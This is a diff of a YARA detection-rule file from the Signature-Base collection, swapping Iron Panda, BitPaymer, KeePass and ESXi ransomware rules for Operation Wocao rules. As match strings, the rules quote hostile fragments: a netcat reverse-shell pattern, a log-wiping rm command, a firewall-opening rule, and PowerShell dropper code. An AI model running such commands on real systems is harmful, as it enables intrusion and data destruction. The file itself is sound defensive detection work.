-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L123-L141"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L77-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742"
-		logic_hash = "ca55fc5aa655fb221808b4c82db520cae24e0d93422293b6ed5e573b343e93ac"
-		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "PluginDeflater.exe" fullword wide
-		$s1 = ".Deflated" fullword wide
-		$s2 = "PluginDeflater" fullword ascii
-		$s3 = "DeflateStream" fullword ascii
-		$s4 = "CompressionMode" fullword ascii
-		$s5 = "System.IO.Compression" fullword ascii
+		logic_hash = "279fb27637d9b62b484283f778215d042de9fb83110a233e048452e921c540ee"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$header = "QlpoOTFBWSZTWWDdHjgABDTfgHwQe////z/v/9+////6YA4cGPsAl2e8M9LSU128"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Ironpanda_Malware4 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_Py
 {
 	meta:
-		description = "Iron Panda Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0a72c1e1-b442-52d4-af52-b863abe5ba3c"
-		date = "2015-09-16"
+		description = "Strings from Python keylogger"
+		author = "Fox-IT SRT"
+		id = "f7b5ec1b-669e-5e7d-a9d3-011d212eb363"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L143-L159"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L91-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c"
-		logic_hash = "12661c8862eeb82d55a3912e0a499beb6bb19f7abe9ccfe6fa0506e6a032cfe4"
+		logic_hash = "2dc2ce153d559d795f302f5ca4a9ef9e6e5c54762472e38e6f4a26ef8a28a184"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "TestPlugin.dll" fullword wide
-		$s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide
-		$s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii
-		$s6 = "TestPlugin" fullword ascii
+		$a = "c:\\windows\\temp\\tap.tmp"
+		$b = "c:\\windows\\temp\\mrteeh.tmp"
+		$c = "GenFileName"
+		$d = "outfile"
+		$e = "[PASTE:%d]"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Bitpaymer_1
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_File
 {
 	meta:
-		description = "Rule to detect newer Bitpaymer samples. Rule is based on BitPaymer custom packer"
-		author = "Morphisec labs"
-		id = "916de232-1f1b-5853-a57f-623812cfed16"
-		date = "2019-10-30"
+		description = "Rule for finding keylogger output files"
+		author = "Fox-IT SRT"
+		id = "22e866b3-4b02-593a-b9a6-aa86870b6509"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "http://blog.morphisec.com/bitpaymer-ransomware-with-new-custom-packer-framework"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_crime_bitpaymer.yar#L1-L12"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L109-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c236794c04f0805d4611cfaf43369eeb4d0e65d6c697e6c5e6afd321fbca629"
+		logic_hash = "6d2d677b69eaf31843e8352bfe040c9e5a8d423d17900e022b769d28789f2d98"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$opcodes1 = {B9 ?? 00 00 00 FF 14 0F B8 FF 00 00 00 C3 89 45 FC}
-		$opcodes2 = {61 55 FF 54 B7 01 B0 FF C9 C3 CC 89 45 FC}
+		$a = { 0d 0a 20 [3-10] 53 74 61 72 74 75 70 3a 20 [3] 20 [3] 20 [2] 20 [2] 3a [2] 3a [2] 20 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( $opcodes1 or $opcodes2 )
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Csharp
 {
 	meta:
-		description = "Detects suspicious entries in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2c031919-da19-5fd0-b21a-2e83679ad1e3"
-		date = "2023-01-25"
+		description = "Strings from the CSharp version of XServer"
+		author = "Fox-IT SRT"
+		id = "48f4c88d-fb56-54ca-84e2-38f88804a50f"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_keepass_cve_2023_24055.yar#L2-L20"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L123-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3ca00f317838819bb7fb80c9d00d94db498e1d3ef146b9af2664dae09302a86d"
+		logic_hash = "1201ee45df78cf3aec4b4bbb59cb7e4a70af6928895bb7c968ef02075a963405"
 		score = 75
-		quality = 81
-		tags = "CVE-2023-24055, FILE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
-		$x1 = "<Parameter>KeePass XML (2.x)</Parameter>"
-		$x2 = "::ReadAllBytes("
-		$x3 = " -Method "
-		$x4 = " bypass "
-		$x5 = "powershell" nocase ascii wide fullword
+		$a = "static void ServerX(int ListenPort)" ascii wide
+		$b = "public class xserver" ascii wide
+		$c = "[xserver]::Main($args);" ascii wide
+		$d = "add rule name=powershell dir=in localport=47000 action=allow" ascii wide
+		$e = "string TempFile = file_path + \".CT\";" ascii wide
+		$f = "Port = 256 * RecvBuf[AddrLen + 5] + RecvBuf[AddrLen + 6];"
+		$g = "CliSock.Send(new byte[] { 0x05, 0x00 });"
 
 	condition:
-		filesize < 200KB and $a1 and 1 of ( $x* )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Keepass_CVE_2023_24055_Jan23 : CVE_2023_24055 FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_B64Encoded
 {
 	meta:
-		description = "Detects suspicious triggers defined in the Keepass configuration file, which could be indicator of the exploitation of CVE-2023-24055"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4ff1a93f-f7f0-528d-9e07-402e321a0ffe"
-		date = "2023-01-25"
+		description = "Piece of Base64 encoded data from the XServer PowerShell dropper"
+		author = "Fox-IT SRT"
+		id = "01e38cfb-b245-5398-b037-6d1d2fb726ee"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/alt3kx/CVE-2023-24055_PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_keepass_cve_2023_24055.yar#L22-L37"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L143-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4ed3eee86baf3dddfe423795491a5a94c02df3f4a7525efa6f2436e19197e55b"
-		score = 60
+		logic_hash = "77315f0fc8387fa87892fc8fcea1f6e8a95560049aaa9a87519859020d0a7a3e"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-24055, FILE"
+		tags = ""
 
 	strings:
-		$a1 = "<TriggerCollection xmlns:xsi=" ascii wide
-		$s1 = "<Action>" ascii wide
-		$s2 = "<Parameter>" ascii wide
+		$header_47000 = "5T39c9u2kr/nr2A0Ny2VKIzkfLRJntuJHafPN/nwWG777rUZDy3BNq8UqSEpx26b"
+		$header_25667 = "5T1rc9u2st/zKxjNmZZKFEZyErdJ6nZsx+nxnTjxWGp77mkzHlqCbd5SpIak/Gjr"
 
 	condition:
-		filesize < 200KB and $a1 and all of ( $s* )
+		any of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_Dropper
 {
 	meta:
-		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers - file encrypt.sh"
-		author = "Florian Roth"
-		id = "7178dbe4-f573-5279-a23e-9bab8ae8b743"
-		date = "2023-02-04"
+		description = "Strings from the PowerShell dropper of XServer"
+		author = "Fox-IT SRT"
+		id = "97169ab4-d68d-5137-83de-d9cac975747e"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L6-L28"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L157-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1143ee36603f604874432ee280314a9f62ffe64e58ec5cd4eb114b7b175b365a"
-		score = 85
-		quality = 60
-		tags = "FILE"
-		hash1 = "10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459"
+		logic_hash = "640c9e52f3cf3df4e954177624e6fba4bab80a2c9442b718fe90e8577dafbbd6"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$x1 = "/bin/find / -name *.log -exec /bin/rm -rf {} \\;" ascii fullword
-		$x2 = "/bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh" ascii fullword
-		$x3 = "grep encrypt | /bin/grep -v grep | /bin/wc -l)" ascii fullword
-		$s1 = "## ENCRYPT" ascii fullword
-		$s2 = "/bin/find / -name *.log -exec /bin" ascii fullword
+		$encfile = "New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($encfile)"
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 10KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_ELF_Esxi_Attacks_Feb23_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Injector_Bin
 {
 	meta:
-		description = "Detects ransomware exploiting and encrypting ESXi servers"
-		author = "Florian Roth"
-		id = "d0a813aa-41f8-57df-b708-18ccb0d7a3e5"
-		date = "2023-02-04"
+		description = "Process injector/launcher"
+		author = "Fox-IT SRT"
+		id = "389279f1-6531-594f-97b6-5adbc8fa4d3d"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-14"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L30-L56"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L170-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27ff018574323c10821993c30cf74de15121caa92a308fbcae4eceae954e63b6"
-		score = 85
+		logic_hash = "c8cd4e3c87c6d80b39069f7a94e512e3f7b739c21f6fd70c2a79829c5a04f32f"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "11b1b2375d9d840912cfd1f0d0d04d93ed0cddb0ae4ddb550a5b62cd044d6b66"
+		tags = ""
 
 	strings:
-		$x1 = "usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]" ascii fullword
-		$x2 = "[ %s ] - FAIL { Errno: %d }" ascii fullword
-		$s1 = "lPEM_read_bio_RSAPrivateKey" ascii fullword
-		$s2 = "lERR_get_error" ascii fullword
-		$s3 = "get_pk_data: key file is empty!" ascii fullword
-		$op1 = { 8b 45 a8 03 45 d0 89 45 d4 8b 45 a4 69 c0 07 53 65 54 89 45 a8 8b 45 a8 c1 c8 19 }
-		$op2 = { 48 89 95 40 fd ff ff 48 83 bd 40 fd ff ff 00 0f 85 2e 01 00 00 48 8b 9d 50 ff ff ff 48 89 9d 30 fd ff ff 48 83 bd 30 fd ff ff 00 78 13 f2 48 0f 2a 85 30 fd ff ff }
-		$op3 = { 31 55 b4 f7 55 b8 8b 4d ac 09 4d b8 8b 45 b8 31 45 bc c1 4d bc 13 c1 4d b4 1d }
+		$a = "%s{%04d-%02d%02d-%02d%02d-%d%ld}.tmp"
+		$b = "s% > s% c/ exe.d"
+		$c = {
+            48 89 5C 24 08 48 89 74  24 10 57 48 83 EC 50 48
+            8B 71 08 48 8D 59 10 48  8B F9 48 8B CB FF 17 33
+            C9 48 8D 47 78 48 89 44  24 48 4C 8D 87 9C 03 00
+            00 48 89 5C 24 40 48 8D  97 90 00 00 00 4C 89 44
+            24 38 45 33 C9 48 89 4C  24 30 45 33 C0 89 4C 24
+            28 C7 44 24 20 01 00 00  00 66 89 4B 40 FF D6 48
+            8B 5C 24 60 33 C0 48 8B  74 24 68 48 83 C4 50 5F
+            C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_PY_Esxi_Backdoor_Dec22 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Timeliner_Bin
 {
 	meta:
-		description = "Detects Python backdoor found on ESXi servers"
-		author = "Florian Roth"
-		id = "f0a3b9b9-0031-5d9f-97f8-70f83863ee63"
-		date = "2022-12-14"
+		description = "Timeliner utility"
+		author = "Fox-IT SRT"
+		id = "3d81a4ae-0ce0-5867-ac93-a706556481b6"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L58-L71"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L195-L213"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "86b628f007720aa706c30d91e845d867ed481d1e99bcc9315c84a4e0b7b1b2a6"
-		score = 85
+		logic_hash = "c3a8cddc34134faaab93ee0df0086604e4a7b031530dd65e2e8dab705483305b"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$x1 = "cmd = str(base64.b64decode(encoded_cmd), " ascii
-		$x2 = "sh -i 2>&1 | nc %s %s > /tmp/" ascii
+		$a = "[+] Work completed." ascii wide
+		$b = "[-] Create a new file failed." ascii wide
+		$c = "[-] This is not a correct path." ascii wide
+		$d = "%s [TargetPath] <Num> <SavePath>" ascii wide
+		$e = "D\t%ld\t%ld\t%ld\t%d\t%d\t%s\t" ascii wide
+		$f = "D\t%ld\t%ld\t%ld\t-1\t%d\t%s\t" ascii wide
+		$g = "%s\t%ld\t%ld\t%ld\t%I64d\t%d\t%s\t%s" ascii wide
 
 	condition:
-		filesize < 10KB and 1 of them or all of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_SH_Esxi_Backdoor_Dec22 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Checkadmin_Bin
 {
 	meta:
-		description = "Detects malicious script found on ESXi servers"
-		author = "Florian Roth"
-		id = "983ac20c-2e61-5365-8849-b3aeb999f909"
-		date = "2022-12-14"
+		description = "Checkadmin utility"
+		author = "Fox-IT SRT"
+		id = "2f819213-ade1-525b-af18-d77b7fc96093"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L73-L87"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L215-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "155a90a6c55b99285555634d91a66fca9c7e7297f05314fa4d6ce1d84257ee11"
+		logic_hash = "784ec960ce2733aebc404ee5c09bb852eb45553ad167db292d05b82feedbd5a6"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$x1 = "mv /bin/hostd-probe.sh /bin/hostd-probe.sh.1" ascii fullword
-		$x2 = "/bin/nohup /bin/python -u /store/packages/vmtools.py" ascii
-		$x3 = "/bin/rm /bin/hostd-probe.sh.1"
+		$a = "[-] %s * A system error has occurred: %d" ascii wide
+		$b = {
+            0D 00 0A 00 25 00 6C 00 64 00 20 00 72 00 65 00
+            73 00 75 00 6C 00 74 00 73 00 2E 00 0D 00 0A 00
+        }
+		$c = "%s\t<Access denied>" ascii wide
 
 	condition:
-		filesize < 10KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_SH_Esxi_Attacks_Feb23_2 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Getos_Py
 {
 	meta:
-		description = "Detects script used in ransomware attacks exploiting and encrypting ESXi servers"
-		author = "Florian Roth"
-		id = "d1282dee-0496-52f1-a2b7-27657ab4df8c"
-		date = "2023-02-06"
+		description = "Python getos utility"
+		author = "Fox-IT SRT"
+		id = "4a731dde-87e4-566a-b559-d23e0bef5841"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://dev.to/xakrume/esxiargs-encryption-malware-launches-massive-attacks-against-vmware-esxi-servers-pfe"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L89-L101"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L234-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3f240784873a0239cbf61f7f420fdd72b8992d5943ffc3d4dcad43c836569f4d"
-		score = 85
+		logic_hash = "2535c01b703c0fcba43e771832db8cd969e4a4b112ef28e4ddfeac6491ba604c"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$x1 = "echo \"START ENCRYPT: $file_e SIZE: $size_kb STEP SIZE: " ascii
+		$smb_1 = {
+            00 00 00 85 ff 53 4d 42 72 00 00 00 00 18 53 c8
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
+            00 00 ff b4 00 62 00 02 50 43 20 4e 45 54 57 4f
+            52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02
+            4c 41 4e 4d 41 4e 31 2e 30 00 02 57 69 6e 64 6f
+            77 73 20 66 6f 72 20 57 6f 72 6b 67 72 6f 75 70
+            73 20 33 2e 31 61 00 02 4c 4d 31 2e 32 58 30 30
+            32 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 02 4e 54
+            20 4c 4d 20 30 2e 31 32 00
+        }
+		$smb_2 = {
+            00 00 00 c8 ff 53 4d 42 73 00 00 00 00 18 03 c8
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
+            00 00 3f b5 0c ff 00 c8 00 04 11 32 00 00 00 00
+            00 00 00 28 00 00 00 00 00 d4 00 00 a0 8d 00 4e
+            54 4c 4d 53 53 50 00 01 00 00 00 07 82 88 a2 00
+            00 00 00 28 00 00 00 00 00 00 00 28 00 00 00 05
+            01 28 0a 00 00 00 0f 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00
+        }
+		$smbstr_1 = "\\x00\\x00\\x00\\x85\\xffSMBr\\x00\\x00\\x00\\x00\\x18S\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00\\xff\\xb4\\x00b\\x00\\x02PC NETWORK PROGRAM 1.0\\x00\\x02LANMAN1.0\\x00\\x02Windows for Workgroups 3.1a\\x00\\x02LM1.2X002\\x00\\x02LANMAN2.1\\x00\\x02NT LM 0.12\\x00"
+		$smbstr_2 = "\\x00\\x00\\x00\\xc8\\xffSMBs\\x00\\x00\\x00\\x00\\x18\\x03\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00?\\xb5\\x0c\\xff\\x00\\xc8\\x00\\x04\\x112\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\xd4\\x00\\x00\\xa0\\x8d\\x00NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x07\\x82\\x88\\xa2\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x05\\x01(\\n\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+		$code_1 = "return 'Other error.'" ascii wide
+		$code_2 = "sblob = buf[47:47 + sbl]" ascii wide
+		$code_3 = "re.split('[\\x00-,]+', y[-4])" ascii wide
+		$code_4 = "('').join(sblob[off:off + hlen].split('\\x00'))" ascii wide
+		$code_5 = "banner = '%s    %s' % (hostname, native)" ascii wide
+		$code_6 = "banner = '%s\\\\%s    %s' % (dm, hostname, native)" ascii wide
+		$tsk_1 = "PushTask" ascii wide
+		$tsk_2 = "parse_task" ascii wide
+		$tsk_3 = "commit_task" ascii wide
+		$str_1 = "Usage: getos.py <ip-range|ip-file>" ascii wide
+		$str_2 = "The path '%s' write fails." ascii wide
+		$str_3 = "Receive a signal %d," ascii wide
+		$str_4 = "Scan Complete!" ascii wide
+		$str_5 = "line: %d, %s: %s" ascii wide
+		$str_6 = "Other error." ascii wide
 
 	condition:
-		filesize < 10KB and 1 of them
+		( all of ( $smb_* ) ) or ( all of ( $smbstr_* ) ) or ( 3 of ( $code_* ) ) or ( all of ( $tsk_* ) ) or ( 3 of ( $str_* ) )
 }
-rule SIGNATURE_BASE_SUSP_Esxiargs_Endpoint_Conf_Aug23 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Info_Vbs
 {
 	meta:
-		description = "Detects indicators found in endpoint.conf files as modified by actors in the ESXiArgs campaign"
-		author = "Florian Roth"
-		id = "3e0b5dbf-7c5b-5599-823a-ce35fbdbe64b"
-		date = "2023-08-04"
+		description = "Strings from the information grabber VBS"
+		author = "Fox-IT SRT"
+		id = "b719fb31-2836-5faf-a7c8-c361a14df2be"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-47"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L103-L120"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L297-L316"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "794d460eec0e2f0b48e6ced94b125a1e48acde6be6281866e0b4a2ae6c2d3b51"
+		logic_hash = "e37f8768c7920b8c3d9fdd6bb3a4e748c47a6c06a8aaed01655355ef3d8c3457"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$a1 = "/client/clients.xml" ascii
-		$a2 = "/var/run/vmware/proxy-sdk-tunnel" ascii fullword
-		$a3 = "redirect" ascii fullword
-		$a4 = "allow" ascii fullword
-		$s1 = " local 8008 allow allow"
+		$ = "Logger PingConnect"
+		$ = "Logger GetAdmins"
+		$ = "Logger InstallPro"
+		$ = "Logger Exec"
+		$ = "retstr = adminsName & \" Members\" & vbCrLf & _"
+		$ = "Logger VolumeName & \" (\" & objDrive.DriveLetter & \":)\" _"
+		$ = "txtRes = txtRes & machine & \" can"
+		$ = "retstr = \"PID   SID Image Name\" & vbCrLf & \"===="
 
 	condition:
-		filesize < 2KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_SUSP_Scheduled_Task_Java_JAR_Aug25 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Console_Jsp
 {
 	meta:
-		description = "Detects scheduled tasks that execute Java JAR files, which is suspicious but not necessarily malicious"
-		author = "Florian Roth"
-		id = "241d921e-7548-5f9e-ae9b-9a7d7cfa5e03"
-		date = "2025-08-07"
-		modified = "2025-08-08"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L1-L23"
+		description = "Strings from the console.jsp webshell"
+		author = "Fox-IT SRT"
+		id = "1afdfc34-d2e3-58c7-80ea-ee5632e42469"
+		date = "2019-12-20"
+		modified = "2023-12-05"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L318-L335"
